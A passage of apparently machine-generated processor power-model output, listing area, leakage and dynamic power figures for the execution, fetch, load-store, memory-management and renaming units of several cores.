'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.282458,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.564916,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.100245,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.100834,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.336512,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.034007,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.668315,
'Memory Management Unit/Runtime Dynamic': 0.134841,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.599,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.264854,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0200685,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.167732,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.452654,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.81602,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0787304,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.264527,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.424947,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.490974,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.350462,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.606874,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.400147,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.35748,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.281267,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.384066,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.18751,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0802817,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0127045,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.121354,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0939578,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.201636,
'Execution Unit/Register Files/Runtime Dynamic': 0.106662,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.31481,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.792375,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.39609,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00181551,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00181551,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00158702,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000617489,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00134971,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00656775,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0172027,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0903241,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.74538,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.218765,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.306781,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.247,
'Instruction Fetch Unit/Runtime Dynamic': 0.639641,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0510915,
'L2/Runtime Dynamic': 0.0108015,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.99657,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.8063,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.121627,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.121627,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.57326,
'Load Store Unit/Runtime Dynamic': 2.52775,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.299912,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.599823,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.10644,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.107206,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.357227,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0358527,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.699739,
'Memory Management Unit/Runtime Dynamic': 0.143059,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.3203,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.280085,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0212911,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.178133,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.479509,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.19685,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0789439,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.264694,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.425997,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.491435,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.35196,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.609468,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.401759,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36319,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.282587,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.385229,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.19216,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0804801,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0127588,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.121831,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0943595,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.202311,
'Execution Unit/Register Files/Runtime Dynamic': 0.107118,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.316021,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.795281,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.40695,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00183089,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00183089,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00160163,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000623801,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00135548,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00661889,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0173072,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0907102,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.76995,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.21938,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.308092,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.27277,
'Instruction Fetch Unit/Runtime Dynamic': 0.642109,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.051916,
'L2/Runtime Dynamic': 0.0109555,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.0097,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.81258,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.122052,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.122052,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.5884,
'Load Store Unit/Runtime Dynamic': 2.53655,
